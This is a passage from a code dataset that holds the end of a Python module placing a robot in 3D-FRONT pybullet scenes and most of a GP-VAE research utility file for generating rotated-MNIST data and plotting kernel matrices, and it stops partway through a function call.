_lookup_model(ref):\n \"\"\" Lookup collision shape from 3D-FUTURE models. \"\"\"\n if ref not in model_map:\n return -1, -1\n mid = model_map[ref]\n model_file = (model_dir / mid / 'raw_model.obj')\n\n # NOTE(ycho): Temporary workaround for degenerate model?\n # if '39057a21-0a68-3494-8522-2e473dd6a38f' in str(model_file):\n # return -1, -1\n\n if not model_file.exists():\n logging.warn('No such model file : {}'.format(model_file))\n return -1, -1\n # TODO(ycho): remove this flag ... only for visualization\n # or leave it in? idk...\n col_id = pb.createCollisionShape(\n pb.GEOM_MESH, fileName=str(model_file),\n meshScale=c['scale'],\n # flags=pb.GEOM_FORCE_CONCAVE_TRIMESH,\n physicsClientId=sim_id\n )\n vis_id = pb.createVisualShape(\n pb.GEOM_MESH, fileName=str(model_file),\n meshScale=c['scale'],\n flags=pb.GEOM_FORCE_CONCAVE_TRIMESH,\n physicsClientId=sim_id\n )\n return (col_id, vis_id)\n\n def _lookup_mesh(ref):\n \"\"\" Lookup collision shape from inline mesh \"\"\"\n if ref not in mesh_map:\n return -1, -1\n (vertices, face_indices) = mesh_map[ref]\n vertices = vertices.astype(np.float64).reshape(-1, 3)\n\n # FIXME(ycho): This is a hack to enable visualization\n # against pybullet issues with backface culling - i.e.\n # rendering the walls from the exterior through a window.\n face_indices = np.c_[\n face_indices,\n face_indices[..., ::-1]\n ]\n face_indices = face_indices.astype(np.int32).reshape(-1)\n col_id = pb.createCollisionShape(pb.GEOM_MESH,\n vertices=vertices,\n indices=face_indices,\n flags=pb.GEOM_FORCE_CONCAVE_TRIMESH,\n physicsClientId=sim_id)\n # NOTE(ycho): VisualShape is redundant for now.\n # vis_id = pb.createVisualShape(pb.GEOM_MESH,\n # vertices=vertices,\n # indices=face_indices,\n # flags=pb.GEOM_FORCE_CONCAVE_TRIMESH,\n # physicsClientId=sim_id)\n vis_id = -1\n return (col_id, vis_id)\n\n # NOTE(ycho): Special handling for `floor` for facilitating free space sampling.\n # TODO(ycho): Remove this workaround after PR#3238 in the remote is merged.\n if (ref in floor_set) and (ref in mesh_map):\n vertices, face_indices = mesh_map[ref]\n face_indices = face_indices.astype(np.int32).reshape(-1)\n R = np.reshape(pb.getMatrixFromQuaternion(c['rot']), (3, 3))\n floor_face_indices = np.r_[\n floor_face_indices, face_indices + len(floor_vertices)]\n floor_vertices = np.r_[\n floor_vertices, vertices @ R.T + c['pos']]\n continue\n\n # Loop through lookup methods until shape is found.\n col_id, vis_id = -1, -1\n for method in [_lookup_cache, _lookup_model, _lookup_mesh]:\n (col_id, vis_id) = method(ref)\n if col_id >= 0:\n break\n\n # Abort this entry if shape not found.\n if col_id < 0:\n continue\n\n # Cache any newly created shapes.\n if ref not in shape_map:\n shape_map[ref] = (col_id, vis_id)\n\n # NOTE(ycho):mass==0 indicates fixed body.\n kwargs['linkMasses'].append(0)\n kwargs['linkCollisionShapeIndices'].append(col_id)\n kwargs['linkVisualShapeIndices'].append(vis_id)\n kwargs['linkPositions'].append(c['pos'])\n kwargs['linkOrientations'].append(c['rot'])\n kwargs['linkInertialFramePositions'].append([0, 0, 0])\n kwargs['linkInertialFrameOrientations'].append([0, 0, 0, 1])\n kwargs['linkParentIndices'].append(0)\n kwargs['linkJointTypes'].append(pb.JOINT_FIXED)\n kwargs['linkJointAxis'].append([0, 0, 0])\n\n logging.info('# links = {}'.format(len(kwargs['linkMasses'])))\n\n # NOTE(ycho): Add special handling for floors.\n # NOTE(ycho): Remove this workaround after PR#3238 in the remote is merged.\n floor_col_id = pb.createCollisionShape(pb.GEOM_MESH,\n vertices=floor_vertices,\n indices=floor_face_indices,\n flags=pb.GEOM_FORCE_CONCAVE_TRIMESH,\n physicsClientId=sim_id)\n kwargs['baseCollisionShapeIndex'] = floor_col_id\n\n # NOTE(ycho): pybullet does not expose MAX_DEGREE_OF_FREEDOM\n # limit on the maximum number of links possible on the multibody,\n # so we duplicate the hardcoded constant here.\n kwargss = _split_multibody_kwargs(kwargs)\n # kwargss = [kwargss[1]]\n body_ids = [pb.createMultiBody(**kwargs) for kwargs in kwargss]\n print('body_ids = {}'.format(body_ids))\n\n for body_id in body_ids:\n # Finally, add texture information to the visual shapes.\n # NOTE(ycho): Texture can only be added in the post-processing step\n # through pb.changeVisualShape().\n tex_map = {}\n vis_data = pb.getVisualShapeData(body_id, physicsClientId=sim_id)\n for i, v in enumerate(vis_data):\n # Lookup mesh file.\n mesh_file = v[4].decode('utf-8')\n if not mesh_file:\n continue\n\n # Find texture file based on mesh file path.\n # NOTE(ycho): Relies on the dataset structure of 3DFRONT.\n texture_file = Path(mesh_file).parent / 'texture.png'\n if not texture_file.exists():\n logging.error(\n 'Texture file : {} does not exist!'.format(texture_file))\n continue\n\n # Deal with texture id caching logic ...\n tex_id = -1\n if texture_file not in tex_map:\n tex_map[texture_file] = pb.loadTexture(\n str(texture_file), physicsClientId=sim_id)\n tex_id = tex_map[texture_file]\n\n # Finally, add texture information to the link.\n pb.changeVisualShape(body_id, i,\n textureUniqueId=tex_id,\n physicsClientId=sim_id)\n return body_ids\n\n\n@dataclass\nclass ThreeDFrontEnvironmentSettings:\n model_dir: str\n scene_file: str = ''\n scene_dir: str = ''\n use_convex_collision: bool = True\n\n use_fast_aabb_in_placement: bool = True\n max_placement_iter: int = 256\n\n\nclass ThreeDFrontEnvironment(EnvironmentBase):\n def __init__(self, settings: ThreeDFrontEnvironmentSettings):\n self.settings_ = settings\n self.env_ids_ = []\n self.sim_id_ = -1\n\n @property\n def sim_id(self):\n return self.sim_id_\n\n def reset(self, sim_id: int):\n self.sim_id_ = sim_id\n\n # Fetch or lookup scene file to instantiate.\n scene_file = ''\n if self.settings_.scene_file:\n scene_file = self.settings_.scene_file\n else:\n if self.settings_.scene_dir:\n # convenient shorthand.\n d = self.settings_.scene_dir\n scene_file = Path(d)/random.choice(os.listdir(d))\n scene_file = Path(scene_file)\n logging.info('Loading scene file = {}'.format(scene_file))\n if not scene_file.is_file():\n logging.error('Scene file : {} does not exist!'.format(scene_file))\n return\n\n # Load the scene.\n self.env_ids_ = _load_tdf_scene(str(scene_file),\n self.settings_.model_dir, sim_id,\n self.settings_.use_convex_collision)\n\n def place(self, robot_id: int):\n # TODO(ycho): Consider exposing this parameter.\n EPS = 1e-3\n\n robot_pose = pb.getBasePositionAndOrientation(robot_id,\n physicsClientId=self.sim_id)\n old_pos = robot_pose[0]\n old_rot = robot_pose[1]\n old_z = old_pos[2]\n\n floor_aabb = np.asarray(pb.getAABB(\n self.env_ids_[0], -1, physicsClientId=self.sim_id), dtype=np.float32)\n robot_aabb = debug_get_full_aabb(self.sim_id, robot_id)\n robot_size = robot_aabb[1] - robot_aabb[0]\n\n # NOTE(ycho): Shrink the sampled space by the robot radius.\n pos_min = floor_aabb[0, :2] + 0.5 * robot_size[:2]\n pos_max = floor_aabb[1, :2] - 0.5 * robot_size[:2]\n\n for i in range(self.settings_.max_placement_iter):\n logging.debug('Placement {}/{}'.format(i,\n self.settings_.max_placement_iter))\n # Sample X-Y position from floor AABB.\n x, y = np.random.uniform(pos_min, pos_max)\n\n # Cast ray from robot top -> floor.\n ray_src = [x, y, floor_aabb[1, 2] +\n robot_aabb[1, 2] - robot_aabb[0, 2]]\n ray_dst = [x, y, floor_aabb[0, 2] - EPS]\n ray_res = pb.rayTest(ray_src, ray_dst, physicsClientId=self.sim_id)\n\n # If by some magic, multiple intersections happened,\n # ignore this case.\n if len(ray_res) != 1:\n continue\n ray_res = ray_res[0]\n\n # The ray must hit env + floor.\n if (ray_res[0] != self.env_ids_[0]) or (ray_res[1] != -1):\n continue\n\n # Complete the desired new position.\n # new_z = floor_aabb[1, 2] + (old_z - robot_aabb[0, 2])\n new_z = floor_aabb[1, 2] + (old_z - robot_aabb[0, 2])\n new_pos = np.asarray([x, y, new_z + EPS], dtype=np.float32)\n new_rot = old_rot\n # NOTE(ycho): Alternatively, sample from a random SE2 orientation:\n # new_rot = pb.getQuaternionFromEuler([0.0, 0.0, np.random.uniform(-np.pi, np.pi)])\n\n # Reject the new position if it collides with existing objects.\n if self.settings_.use_fast_aabb_in_placement:\n # NOTE(ycho): This query is conservative, so the returned objects\n # may not actually overlap with the robot. However,\n # perhaps if the object is close enough to the robot that we should\n new_aabb = robot_aabb + new_pos - old_pos\n o = pb.getOverlappingObjects(new_aabb[0], new_aabb[1],\n physicsClientId=self.sim_id)\n if o is not None:\n continue\n\n pb.resetBasePositionAndOrientation(robot_id,\n new_pos,\n new_rot,\n physicsClientId=self.sim_id)\n break\n else:\n # Actually place the robot where it would go,\n # and then check if it results in a collision.\n # Try placing the robot here now ...\n # NOTE(ycho): Since pybullet uses a default collision margin (0.04 I think?),\n # even this may be a little bit more conservative than the actual collision.\n pb.resetBasePositionAndOrientation(robot_id,\n new_pos,\n new_rot,\n physicsClientId=self.sim_id)\n col = False\n for env_id in self.env_ids_:\n cpts = pb.getClosestPoints(env_id, robot_id,\n np.inf,\n physicsClientId=self.sim_id)\n for cpt in cpts:\n if cpt[8] < 0:\n col = True\n break\n # Early exit if collision found\n if col:\n break\n # Continue searching if collision found\n if col:\n continue\n\n # All is well! break.\n break\n","repo_name":"iMSquared/imm_sim","sub_path":"src/imm/sim/env/three_d_front_env.py","file_name":"three_d_front_env.py","file_ext":"py","file_size_in_byte":17389,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"32040966699","text":"import tensorflow as tf\r\nimport tensorflow_probability as tfp\r\nfrom tensorflow.python.ops import math_ops as tfmath_ops\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport os\r\nfrom datetime import datetime as dt\r\nimport glob\r\nfrom matplotlib.patches import Ellipse\r\nimport shutil\r\nimport pandas as pd\r\nimport pickle\r\nimport time\r\nimport subprocess as sp\r\nimport math\r\n\r\n\r\nimport random\r\nfrom sklearn.decomposition import PCA\r\nfrom scipy import ndimage\r\nimport scipy\r\nimport seaborn as sns\r\n\r\ntfk = tfp.math.psd_kernels\r\n\r\n\r\ndef make_checkpoint_folder(base_dir, expid=None, extra=\"\"):\r\n \"\"\"\r\n Makes a folder and sub folders for pics and results\r\n Args:\r\n base_dir: the root directory where new folder will be made\r\n expid: optional extra sub dir inside base_dir\r\n \"\"\"\r\n\r\n # make a \"root\" dir to store all checkpoints\r\n # homedir = os.getenv(\"HOME\")\r\n # base_dir = homedir+\"/GPVAE_checkpoints/\"\r\n\r\n if expid is not None:\r\n base_dir = base_dir + \"/\" + expid + \"/\"\r\n\r\n if not os.path.exists(base_dir):\r\n os.makedirs(base_dir)\r\n \r\n # now make a unique folder inside the root for this experiments\r\n filenum = str(len(os.listdir(base_dir))) + \"_\"+extra+\"__on__\"\r\n\r\n T = dt.now()\r\n\r\n filetime = str(T.day)+\"_\"+str(T.month)+\"_\"+str(T.year) + \"__at__\"\r\n filetime += str(T.hour)+\"_\"+str(T.minute)+\"_\"+str(T.second)\r\n\r\n # main folder\r\n checkpoint_folder = base_dir + filenum + filetime\r\n os.makedirs(checkpoint_folder)\r\n\r\n # pictures folder\r\n pic_folder = checkpoint_folder + \"/pics/\"\r\n os.makedirs(pic_folder)\r\n\r\n # pickled results files\r\n res_folder = checkpoint_folder + \"/res/\"\r\n os.makedirs(res_folder)\r\n\r\n # source code\r\n src_folder = checkpoint_folder + \"/sourcecode/\"\r\n os.makedirs(src_folder)\r\n old_src_dir = os.path.dirname(os.path.abspath(__file__)) + \"/\"\r\n src_files = os.listdir(old_src_dir)\r\n print(\"\\n\\nCopying source Code to \"+src_folder)\r\n for f in src_files:\r\n if \".py\" in f:\r\n src_file = old_src_dir + f\r\n shutil.copy2(src_file, src_folder)\r\n print(src_file)\r\n print(\"\\n\")\r\n\r\n # predictions folder, for plotting purposes\r\n preds_folder = checkpoint_folder + \"/preds/\"\r\n os.makedirs(preds_folder)\r\n\r\n \r\n return checkpoint_folder + \"/\"\r\n\r\n\r\nclass pandas_res_saver:\r\n \"\"\"\r\n Takes a file and a list of col names to initialise a\r\n pandas array. Then accepts extra rows to be added\r\n and occasionally written to disc.\r\n \"\"\"\r\n def __init__(self, res_file, colnames):\r\n # reload old results frame\r\n if os.path.exists(res_file):\r\n if list(pd.read_pickle(res_file).columns)==colnames:\r\n print(\"res_file: recovered \")\r\n self.data = pd.read_pickle(res_file)\r\n self.res_file = res_file\r\n else:\r\n print(\"res_file: old exists but not same, making new \")\r\n self.res_file = res_file + \"_\" + str(time.time())\r\n self.data = pd.DataFrame(columns=colnames)\r\n else:\r\n print(\"res_file: new\")\r\n self.res_file = res_file\r\n self.data = pd.DataFrame(columns=colnames)\r\n \r\n self.ncols = len(colnames)\r\n self.colnames = colnames\r\n \r\n def __call__(self, new_data, n_steps=10):\r\n new_data = np.asarray(new_data).reshape((-1, self.ncols))\r\n new_data = pd.DataFrame(new_data, columns=self.colnames)\r\n self.data = pd.concat([self.data, new_data])\r\n\r\n if self.data.shape[0]%n_steps == 0:\r\n self.data.to_pickle(self.res_file)\r\n print(\"Saved results to file: \"+self.res_file)\r\n\r\n\r\ndef gauss_cross_entropy(mu1, var1, mu2, var2):\r\n \"\"\"\r\n Computes the element-wise cross entropy\r\n Given q(z) ~ N(z| mu1, var1)\r\n returns E_q[ log N(z| mu2, var2) ]\r\n args:\r\n mu1: mean of expectation (batch, tmax, 2) tf variable\r\n var1: var of expectation (batch, tmax, 2) tf variable\r\n mu2: mean of integrand (batch, tmax, 2) tf variable\r\n var2: var of integrand (batch, tmax, 2) tf variable\r\n returns:\r\n cross_entropy: (batch, tmax, 2) tf variable\r\n \"\"\"\r\n\r\n term0 = 1.8378770664093453 # log(2*pi)\r\n term1 = tf.log(var2)\r\n term2 = (var1 + mu1 ** 2 - 2 * mu1 * mu2 + mu2 ** 2) / var2\r\n\r\n cross_entropy = -0.5 * (term0 + term1 + term2)\r\n\r\n return cross_entropy\r\n \r\n\r\ndef generate_rotated_MNIST(save_path, N=400, nr_angles=16, valid_set_size=0.1, drop_rate=0.25, digits=[3, 6],\r\n latent_dim_object_vector=8, shuffle_data=True, seed=0):\r\n \"\"\"\r\n Generate rotated MNIST data from Casale's paper.\r\n\r\n Saves train, validation and test sets as pickle files.\r\n Each dataset is a Pyhton dictionary with keys: ['images', 'auxiliary data'].\r\n Auxiliary data consists of image id, rotation angle and PCA embedding vector.\r\n\r\n :param save_path: path for saving the generated data\r\n :param N: number of MNIST images of specified digits to use\r\n :param nr_angles: number of angles between [0, 2pi) considered\r\n :param valid_set_size: size of validation set\r\n :param drop_rate: how much images to drop\r\n :param digit: which digit to consider\r\n :param shuffle_data: whether or not to shuffle data. Might be important since if we pass\r\n all angles of the same digit in same batch, kernel matrices carry more information that model could exploit.\r\n Note that for Michael's extrapolatingGPVAE idea, data should not be shuffled, since there independent GPs are\r\n fitted for each image.\r\n :param latent_dim_object_vector: dimension of latent dimension of object vectors\r\n :param seed: random seed, for reproducibility\r\n \"\"\"\r\n\r\n random.seed(seed)\r\n angles = np.linspace(0, 360, nr_angles + 1)[:-1]\r\n\r\n # load MNIST data\r\n (x_train, y_train), (_, _) = tf.keras.datasets.mnist.load_data()\r\n\r\n # Rescale the images from [0,255] to the [0.0,1.0] range.\r\n x_train = x_train[..., np.newaxis] / 255.0\r\n\r\n # TODO: should MNIST images be binarized here?\r\n\r\n # filter out images with correct digit\r\n digits_df = []\r\n for digit in digits:\r\n x_train_digit = x_train[(y_train == digit)]\r\n print('Number of images with digit {}: {}'.format(digit, len(x_train_digit)))\r\n\r\n # subsample N images\r\n indices = random.sample(list(range(x_train_digit.shape[0])), N)\r\n digits_df.append(x_train_digit[indices, :, :, 0]) # (N, 28, 28)\r\n\r\n x_train = np.concatenate(digits_df)\r\n\r\n # PCA\r\n pca_df = x_train.copy().reshape((x_train.shape[0], -1))\r\n pca = PCA(n_components=latent_dim_object_vector)\r\n pca_df = pca.fit_transform(pca_df)\r\n print(\"Explained variance ratio PCA: {}\".format(pca.explained_variance_ratio_))\r\n\r\n # save pca_df to pickle (for init of object vectors)\r\n digit_ending = \"\".join([str(x) for x in digits])\r\n with open(save_path + 'pca_ov_init{}_{}.p'.format(digit_ending, latent_dim_object_vector), 'wb') as ov_init_pickle:\r\n pickle.dump(pca_df, ov_init_pickle)\r\n\r\n # rotate images\r\n def rotate_image(image, image_id, angles, pca_embedding):\r\n images = []\r\n\r\n aux_data = np.array([tuple([image_id, math.radians(angle)] + list(pca_embedding)) for angle in angles])\r\n\r\n for i in range(len(angles)):\r\n images.append(ndimage.rotate(image, angles[i], reshape=False))\r\n\r\n images = np.stack(images)\r\n images = images[..., np.newaxis]\r\n\r\n return images, aux_data\r\n\r\n images, aux_data = [], []\r\n\r\n assert len(digits) * N == x_train.shape[0]\r\n for i in range(len(digits) * N):\r\n images_rot, aux_data_i = rotate_image(x_train[i, :, :], i, angles, pca_df[i, :].copy())\r\n images.append(images_rot)\r\n aux_data.append(aux_data_i)\r\n\r\n images = np.concatenate(images) # (N * len(angles), 28, 28, 1)\r\n aux_data = np.concatenate(aux_data) # (N * len(angles), 10)\r\n\r\n # train/test and eval split\r\n images_, aux_data_, eval_images_, eval_aux_data_ = [], [], [], []\r\n N_digit = int(len(images) / len(digits))\r\n N_eval = int(N_digit * (1 - valid_set_size))\r\n for i in range(len(digits)):\r\n images_.append(images[i * N_digit:i * N_digit + N_eval])\r\n aux_data_.append(aux_data[i * N_digit:i * N_digit + N_eval])\r\n eval_images_.append(images[i * N_digit + N_eval:(i + 1) * N_digit])\r\n eval_aux_data_.append(aux_data[i * N_digit + N_eval:(i + 1) * N_digit])\r\n\r\n images, aux_data, eval_images, eval_aux_data = np.concatenate(images_), np.concatenate(aux_data_), \\\r\n np.concatenate(eval_images_), np.concatenate(eval_aux_data_)\r\n\r\n # shuffle eval data\r\n if shuffle_data:\r\n eval_idx = random.sample(list(range(len(eval_images))), len(eval_images))\r\n eval_images, eval_aux_data = eval_images[eval_idx], eval_aux_data[eval_idx]\r\n\r\n # train and test split\r\n test_angle = random.sample(list(angles), 1)[0]\r\n mask = (aux_data[:, 1] == math.radians(test_angle))\r\n train_images, train_aux_data, test_images, test_aux_data = images[~mask], aux_data[~mask], \\\r\n images[mask], aux_data[mask]\r\n print(\"Test angle: {}\".format(test_angle))\r\n\r\n # drop some images\r\n if shuffle_data:\r\n idx_train = random.sample(list(range(len(train_images))), int(len(train_images) * (1 - drop_rate)))\r\n idx_test = random.sample(list(range(len(test_images))), int(len(test_images) * (1 - drop_rate)))\r\n else:\r\n idx_train = list(range(int(len(train_images) * (1 - drop_rate))))\r\n idx_test = list(range(int(len(test_images) * (1 - drop_rate))))\r\n\r\n idx_train_not_in_test = list(range(int(len(train_images) * (1 - drop_rate)), len(train_images)))\r\n train_not_in_test_images = train_images[idx_train_not_in_test]\r\n train_not_in_test_aux_data = train_aux_data[idx_train_not_in_test]\r\n\r\n train_images, train_aux_data = train_images[idx_train], train_aux_data[idx_train]\r\n test_images, test_aux_data = test_images[idx_test], test_aux_data[idx_test]\r\n\r\n print('Size of training data: {}'.format(len(train_images)))\r\n print('Size of validation data: {}'.format(len(eval_images)))\r\n print('Size of test data: {}'.format(len(test_images)))\r\n\r\n if not shuffle_data:\r\n print('Size of training data without test ids: {}'.format(len(train_not_in_test_images)))\r\n\r\n # save to pickle files\r\n train_dict = {'images': train_images, 'aux_data': train_aux_data}\r\n eval_dict = {'images': eval_images, 'aux_data': eval_aux_data}\r\n test_dict = {'images': test_images, 'aux_data': test_aux_data}\r\n\r\n if not shuffle_data:\r\n train_not_in_test_dict = {'images': train_not_in_test_images, 'aux_data': train_not_in_test_aux_data}\r\n\r\n ending = \"_not_shuffled_{}.p\".format(latent_dim_object_vector) if not shuffle_data else \"_{}.p\".format(latent_dim_object_vector)\r\n ending = digit_ending + ending\r\n print(ending)\r\n\r\n with open(save_path + 'train_data' + ending, 'wb') as train_pickle:\r\n pickle.dump(train_dict, train_pickle)\r\n with open(save_path + 'eval_data' + ending, 'wb') as eval_pickle:\r\n pickle.dump(eval_dict, eval_pickle)\r\n with open(save_path + 'test_data' + ending, 'wb') as test_pickle:\r\n pickle.dump(test_dict, test_pickle)\r\n\r\n if not shuffle_data:\r\n with open(save_path + 'train_not_in_test_data' + ending, 'wb') as train_pickle:\r\n pickle.dump(train_not_in_test_dict, train_pickle)\r\n\r\n\r\ndef plot_mnist(arr, recon_arr, title, nr_images=8, seed=0):\r\n \"\"\"\r\n\r\n :param arr:\r\n :param recon_arr:\r\n :param title:\r\n :param nr_images:\r\n :param seed:\r\n :return:\r\n \"\"\"\r\n random.seed(seed)\r\n assert nr_images % 8 == 0\r\n\r\n indices = random.sample(list(range(len(arr))), nr_images)\r\n plt.figure(figsize=(10, 10*int(nr_images/8)))\r\n plt.suptitle(title)\r\n for i in range(int(nr_images*2)):\r\n plt.subplot(int(nr_images / 2), 4, i + 1)\r\n plt.xticks([])\r\n plt.yticks([])\r\n plt.grid(False)\r\n if i % 2 == 0:\r\n plt.imshow(arr[indices[i // 2]][:, :, 0], cmap='gray')\r\n plt.xlabel(\"Ground truth, id: {}\".format(indices[i // 2]))\r\n else:\r\n plt.imshow(recon_arr[indices[i // 2]][:, :, 0], cmap='gray')\r\n plt.xlabel(\"Recon image, id: {}\".format(indices[i // 2]))\r\n # plt.tight_layout()\r\n plt.draw()\r\n\r\n\r\ndef visualize_kernel_matrices(aux_data_arr, batch_size=32, N=1, K_obj_normalized=True,\r\n amplitude=1.0, length_scale=1.0):\r\n \"\"\"\r\n Visualize heatmaps of kernel matrices.\r\n\r\n :param aux_data_arr:\r\n :param batch_size:\r\n :param N: number of batches to visualize\r\n :param K_obj_normalized: whether or not to normalize (between -1 and 1) object kernel matrix (linear kernel)\r\n :param amplitude:\r\n :param length_scale:\r\n \"\"\"\r\n\r\n # define kernels\r\n kernel_view = tfk.ExpSinSquared(amplitude=amplitude, length_scale=length_scale, period=2 * np.pi)\r\n kernel_object = tfk.Linear()\r\n x = tf.placeholder(dtype=tf.float32)\r\n y = tf.placeholder(dtype=tf.float32)\r\n z = tf.placeholder(dtype=tf.float32)\r\n w = tf.placeholder(dtype=tf.float32)\r\n K_view = kernel_view.matrix(tf.expand_dims(x, axis=1), tf.expand_dims(y, axis=1))\r\n K_obj = kernel_object.matrix(z, w)\r\n if K_obj_normalized:\r\n obj_norm = 1 / tf.matmul(tf.math.reduce_euclidean_norm(z, axis=1, keepdims=True),\r\n tf.transpose(tf.math.reduce_euclidean_norm(z, axis=1, keepdims=True), perm=[1, 0]))\r\n K_obj = K_obj * obj_norm\r\n K_prod = K_view * K_obj\r\n\r\n # util function for heatmaps\r\n def heatmap(ax_, arr, title, vmin=0, vmax=1):\r\n ax = sns.heatmap(arr, vmin=vmin, vmax=vmax, center=0,\r\n cmap=sns.diverging_palette(20, 220, n=200),\r\n square=True, ax=ax_)\r\n ax.set_xticklabels(ax.get_xticklabels(),\r\n rotation=45,\r\n horizontalalignment='right')\r\n ax.set_title(title);\r\n\r\n for i in range(N):\r\n # generate kernel matrices\r\n batch = aux_data_arr[i * batch_size:(i + 1) * batch_size]\r\n with tf.Session() as sess:\r\n K_view_, K_obj_, K_prod_ = sess.run([K_view, K_obj, K_prod],\r\n {x: batch[:, 1], y: batch[:, 1], z: batch[:, 2:], w: batch[:, 2:]})\r\n # plot kernel matrices\r\n fig, axes = plt.subplots(nrows=1, ncols=3, figsize=(20, 5))\r\n heatmap(axes[0], K_view_, \"View kernel. Batch: {}. Det: {}\".format(i + 1, np.linalg.det(K_view_)))\r\n heatmap(axes[1], K_obj_, \"Object kernel. Batch: {}. Det: {}\".format(i + 1, np.linalg.det(K_obj_)), vmin=-1)\r\n heatmap(axes[2], K_prod_, \"Product kernel. Batch: {}. Det: {}\".format(i + 1, np.linalg.det(K_prod_)), vmin=-1)\r\n plt.show()\r\n\r\n\r\ndef import_rotated_mnist(MNIST_path, ending, batch_size, digits=\"3\", N_t=None):\r\n \"\"\"\r\n\r\n Support for loading of data and batching via tf.data.Dataset API.\r\n\r\n :param MNIST_path:\r\n :param ending:\r\n :param batch_size:\r\n :param N_t: How many angels in train set for each image in test set\r\n (since reGPVAE implementation is based on not_shuffled data).\r\n\r\n :return:\r\n \"\"\"\r\n\r\n # TODO: here we load entire data in the memory. For MNIST that is fine, for larger datasets will have to\r\n # implement it in more efficient way\r\n\r\n # train data\r\n train_data_dict = pickle.load(open(MNIST_path + 'train_data' + ending, 'rb'))\r\n if N_t is not None:\r\n flatten = lambda l: [item for sublist in l for item in sublist]\r\n digit_mask = [True] * N_t + [False] * (15 - N_t)\r\n\r\n mask = [random.sample(digit_mask, len(digit_mask)) for _ in range(int(len(train_data_dict['aux_data'])/15))]\r\n mask = flatten(mask)\r\n train_data_dict['images'] = train_data_dict['images'][mask]\r\n train_data_dict['aux_data'] = train_data_dict['aux_data'][mask]\r\n\r\n # add train images without test angles\r\n if N_t < 15:\r\n train_not_in_test_data_dict = pickle.load(open(MNIST_path + 'train_not_in_test_data' + ending, 'rb'))\r\n\r\n n = int(len(digits) * 270 * (15 - N_t) / N_t) * N_t\r\n\r\n mask = [random.sample(digit_mask, len(digit_mask)) for _ in range(int(len(train_not_in_test_data_dict['aux_data']) / 15))]\r\n mask = flatten(mask)\r\n\r\n train_data_dict['images'] = np.concatenate((train_data_dict['images'],\r\n train_not_in_test_data_dict['images'][mask][:n, ]), axis=0)\r\n train_data_dict['aux_data'] = np.concatenate((train_data_dict['aux_data'],\r\n train_not_in_test_data_dict['aux_data'][mask][:n, ]), axis=0)\r\n\r\n train_data_images = tf.data.Dataset.from_tensor_slices(train_data_dict['images'])\r\n train_data_aux_data = tf.data.Dataset.from_tensor_slices(train_data_dict['aux_data'])\r\n train_data = tf.data.Dataset.zip((train_data_images, train_data_aux_data)).batch(batch_size)\r\n\r\n # eval data\r\n eval_batch_size_placeholder = tf.compat.v1.placeholder(dtype=tf.int64, shape=())\r\n eval_data_dict = pickle.load(open(MNIST_path + 'eval_data' + ending, 'rb'))\r\n eval_data_images = tf.data.Dataset.from_tensor_slices(eval_data_dict['images'])\r\n eval_data_aux_data = tf.data.Dataset.from_tensor_slices(eval_data_dict['aux_data'])\r\n eval_data = tf.data.Dataset.zip((eval_data_images, eval_data_aux_data)).batch(eval_batch_size_placeholder)\r\n\r\n # test data\r\n test_batch_size_placeholder = tf.compat.v1.placeholder(dtype=tf.int64, shape=())\r\n test_data_dict = pickle.load(open(MNIST_path + 'test_data' + ending, 'rb'))\r\n test_data_images = tf.data.Dataset.from_tensor_slices(test_data_dict['images'])\r\n test_data_aux_data = tf.data.Dataset.from_tensor_slices(test_data_dict['aux_data'])\r\n test_data = tf.data.Dataset.zip((test_data_images, test_data_aux_data)).batch(test_batch_size_placeholder)\r\n\r\n # init iterator\r\n iterator = tf.data.Iterator.from_structure(train_data.output_types, train_data.output_shapes)\r\n training_init_op = iterator.make_initializer(train_data)\r\n eval_init_op = iterator.make_initializer(eval_data)\r\n test_init_op = iterator.make_initializer(test_data)\r\n\r\n return iterator, training_init_op, eval_init_op, test_init_op, \\\r\n train_data_dict, eval_data_dict, test_data_dict, eval_batch_size_placeholder, test_batch_size_placeholder\r\n\r\n\r\ndef print_trainable_vars(vars):\r\n total_parameters = 0\r\n print(\"\\n\\nTrainable variables:\")\r\n for v in vars:\r\n print(v)\r\n shape = v.get_shape()\r\n var_params = 1\r\n for dim in shape:\r\n var_params *= dim.value\r\n total_parameters += var_params\r\n print(\"Number of train params: {}\".format(total_parameters))\r\n\r\n\r\ndef latent_samples_VAE_full_train(train_images, vae, clipping_qs=False):\r\n \"\"\"\r\n Get latent samples for training data. For t-SNE plots :)\r\n\r\n :param train_images:\r\n :param vae:\r\n :param clipping_qs:\r\n :return:\r\n \"\"\"\r\n\r\n # ENCODER NETWORK\r\n qnet_mu, qnet_var = vae.encode(train_images)\r\n\r\n # clipping of VAE posterior variance\r\n if clipping_qs:\r\n qnet_var = tf.clip_by_value(qnet_var, 1e-3, 10)\r\n\r\n # SAMPLE\r\n epsilon = tf.random.normal(shape=tf.shape(qnet_mu), dtype=vae.dtype)\r\n latent_samples = qnet_mu + epsilon * tf.sqrt(qnet_var)\r\n\r\n return latent_samples\r\n\r\n\r\nif __name__==\"__main__\":\r\n\r\n # generate_init_inducing_points(\"MNIST data/train_data3.p\", PCA=False)\r\n\r\n # ============= generating rotated MNIST data =============\r\n # generate_rotated_MNIST(\"MNIST data/\", digits=[3, 6])\r\n # generate_rotated_MNIST(\"MNIST data/\", digits=[1, 3, 6, 7, 9])\r\n # generate_rotated_MNIST(\"MNIST data/\")\r\n # generate_rotated_MNIST('MNIST data/', shuffle_data=False, digits=[6])\r\n # generate_rotated_MNIST('MNIST data/', shuffle_data=False, digits=[3])\r\n # generate_rotated_MNIST('MNIST data/', shuffle_data=False, digits=[3, 6])\r\n # generate_rotated_MNIST('MNIST data/', shuffle_data=False, digits=[1, 3, 6, 7, 9])\r\n # generate_rotated_MNIST('MNIST data/', shuffle_data=True, digits=[0, 1, 2, 3, 4, 5, 6, 7, 8, 9])\r\n # generate_rotated_MNIST('MNIST data/', shuffle_data=False, digits=[0, 1, 2, 3, 4, 5, 6, 7, 8, 9])\r\n # generate_rotated_MNIST(\"MNIST data/\", digits=[3], latent_dim_object_vector=4)\r\n # generate_rotated_MNIST(\"MNIST data/\", digits=[3], latent_dim_object_vector=16)\r\n # generate_rotated_MNIST(\"MNIST data/\", digits=[3], latent_dim_object_vector=32)\r\n # generate_rotated_MNIST(\"MNIST data/\", digits=[3], latent_dim_object_vector=64)\r\n generate_rotated_MNIST(\"MNIST data/\", digits=[3], 